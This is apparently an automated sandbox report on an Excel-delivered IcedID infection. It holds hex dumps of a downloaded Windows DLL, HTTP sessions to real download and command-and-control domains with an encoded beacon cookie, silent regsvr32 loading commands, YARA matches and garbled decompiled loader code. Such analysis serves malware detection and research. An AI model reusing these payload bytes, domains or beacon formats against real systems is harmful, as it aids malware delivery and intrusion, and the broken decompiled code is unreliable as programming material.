                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ocmxjgLt%2BvuAv4BFJerr4CJ33CfLsSewGNM04zr3hKJ8YbG4eWEAAUDw8maqaCcd08HCzArG9FIgv6XoMEZUwWFeO6zgqJi6r9r%2BiaVtE1Fv55yev2rcWCcnhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 66a9d4c98c7f4e2b-FRA
                                                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.351865053 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: @@
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.351887941 CEST6INData Raw: 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00
                                                                                                                                                                                                                                                Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.351913929 CEST7INData Raw: 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84
                                                                                                                                                                                                                                                Data Ascii: HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.351937056 CEST9INData Raw: 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00 00 48 8b 94 24 a0
                                                                                                                                                                                                                                                Data Ascii: D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4$
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.351963043 CEST10INData Raw: 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84
                                                                                                                                                                                                                                                Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.351985931 CEST12INData Raw: a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24
                                                                                                                                                                                                                                                Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.352011919 CEST13INData Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00
                                                                                                                                                                                                                                                Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.352035046 CEST15INData Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24
                                                                                                                                                                                                                                                Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.352056980 CEST16INData Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00
                                                                                                                                                                                                                                                Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.352662086 CEST18INData Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00
                                                                                                                                                                                                                                                Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                2192.168.2.2249167104.21.55.8380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.533940077 CEST65OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                                Host: uppercilio.fun
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.604885101 CEST66INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 15:22:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                Age: 5182
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=UHggIIZ98jwltzBE81D5zkuNm%2BjJaaQbPThO9XhgF42U8J4gtq7ZtehOHEvs%2FsKzdKXUblGzs0j18MK52UWbxrWa0rNEMriGne04ng%2FRnIvGU62n7LWUFFfBVaQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 66a9d4cb0f51177a-FRA
                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                                Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 14
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.604918957 CEST66INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                3192.168.2.2249169104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:57.020235062 CEST324OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cookie: __gads=3565085024:1:6014:54; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323130393739:416C627573:32364541373643334632324136413744; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                                                                Host: astrocycle.download
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:57.565305948 CEST325INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 15:22:57 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jFzoqKBpgQ1bPYHzmAE4Sb6EBouSGk8Po9BU16DgdoIxPANwRHYT5%2BKPh1jvEoKT88xEYq7ricfpWb0z%2BTrQAXpxW9ulQWJvX9Oxvfr1cyksoHyJpg2K9yeHjLmE4glJ4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 66a9d4da8ec2c2f4-FRA
                                                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                                Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:57.565336943 CEST325INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                HTTPS Packets

                                                                                                                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.735027075 CEST13.224.92.73443192.168.2.2249168CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                                                                CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                                                                CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                                                                CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                Analysis Process: EXCEL.EXE PID: 2396 Parent PID: 584

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Start time:17:22:35
                                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                                                Imagebase:0x13f820000
                                                                                                                                                                                                                                                File size:27641504 bytes
                                                                                                                                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 2388 Parent PID: 2396

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Start time:17:22:38
                                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                                                                Imagebase:0xffed0000
                                                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 956 Parent PID: 2396

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Start time:17:22:38
                                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                                                                Imagebase:0xffed0000
                                                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2089120426.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 2172 Parent PID: 2396

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Start time:17:22:42
                                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                                                                Imagebase:0xffed0000
                                                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                Code Analysis

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Analysis Process: regsvr32.exe PID: 956 Parent PID: 2396 regsvr32.exeCOMMON

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 002D27BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                                                                                                  			E002D27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E002D2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x2d70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E002D2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                                                                  0x002d27bc
                                                                                                                                                                                                                                                  0x002d27bc
                                                                                                                                                                                                                                                  0x002d27bc
                                                                                                                                                                                                                                                  0x002d27bf
                                                                                                                                                                                                                                                  0x002d27c3
                                                                                                                                                                                                                                                  0x002d27c7
                                                                                                                                                                                                                                                  0x002d27cb
                                                                                                                                                                                                                                                  0x002d27d4
                                                                                                                                                                                                                                                  0x002d27d7
                                                                                                                                                                                                                                                  0x002d27e7
                                                                                                                                                                                                                                                  0x002d27ea
                                                                                                                                                                                                                                                  0x002d27fa
                                                                                                                                                                                                                                                  0x002d2800
                                                                                                                                                                                                                                                  0x002d2806
                                                                                                                                                                                                                                                  0x002d285f
                                                                                                                                                                                                                                                  0x002d285f
                                                                                                                                                                                                                                                  0x002d2876
                                                                                                                                                                                                                                                  0x002d287b
                                                                                                                                                                                                                                                  0x002d2893
                                                                                                                                                                                                                                                  0x002d2893
                                                                                                                                                                                                                                                  0x002d280f
                                                                                                                                                                                                                                                  0x002d2814
                                                                                                                                                                                                                                                  0x002d281f
                                                                                                                                                                                                                                                  0x002d282c
                                                                                                                                                                                                                                                  0x002d282c
                                                                                                                                                                                                                                                  0x002d282f
                                                                                                                                                                                                                                                  0x002d2835
                                                                                                                                                                                                                                                  0x002d283b
                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                  0x002d2842
                                                                                                                                                                                                                                                  0x002d2845
                                                                                                                                                                                                                                                  0x002d2849
                                                                                                                                                                                                                                                  0x002d2894
                                                                                                                                                                                                                                                  0x002d2897
                                                                                                                                                                                                                                                  0x002d289e
                                                                                                                                                                                                                                                  0x002d28a9
                                                                                                                                                                                                                                                  0x002d28b5
                                                                                                                                                                                                                                                  0x002d28b7
                                                                                                                                                                                                                                                  0x002d28ba
                                                                                                                                                                                                                                                  0x002d28c1
                                                                                                                                                                                                                                                  0x002d28c8
                                                                                                                                                                                                                                                  0x002d28cd
                                                                                                                                                                                                                                                  0x002d28d0
                                                                                                                                                                                                                                                  0x002d28d0
                                                                                                                                                                                                                                                  0x002d28b5
                                                                                                                                                                                                                                                  0x002d28d7
                                                                                                                                                                                                                                                  0x002d28da
                                                                                                                                                                                                                                                  0x002d28df
                                                                                                                                                                                                                                                  0x002d28e8
                                                                                                                                                                                                                                                  0x002d28ed
                                                                                                                                                                                                                                                  0x002d28f6
                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                  0x002d28fc
                                                                                                                                                                                                                                                  0x002d284b
                                                                                                                                                                                                                                                  0x002d2854
                                                                                                                                                                                                                                                  0x002d2859
                                                                                                                                                                                                                                                  0x002d2859

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?,00000000,002D2CFE,?,?,00000003,002D24A4), ref: 002D280F
                                                                                                                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(?,?,00000000,002D2CFE,?,?,00000003,002D24A4), ref: 002D2845
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2089142950.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AdaptersInfo
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3177971545-0
                                                                                                                                                                                                                                                  • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
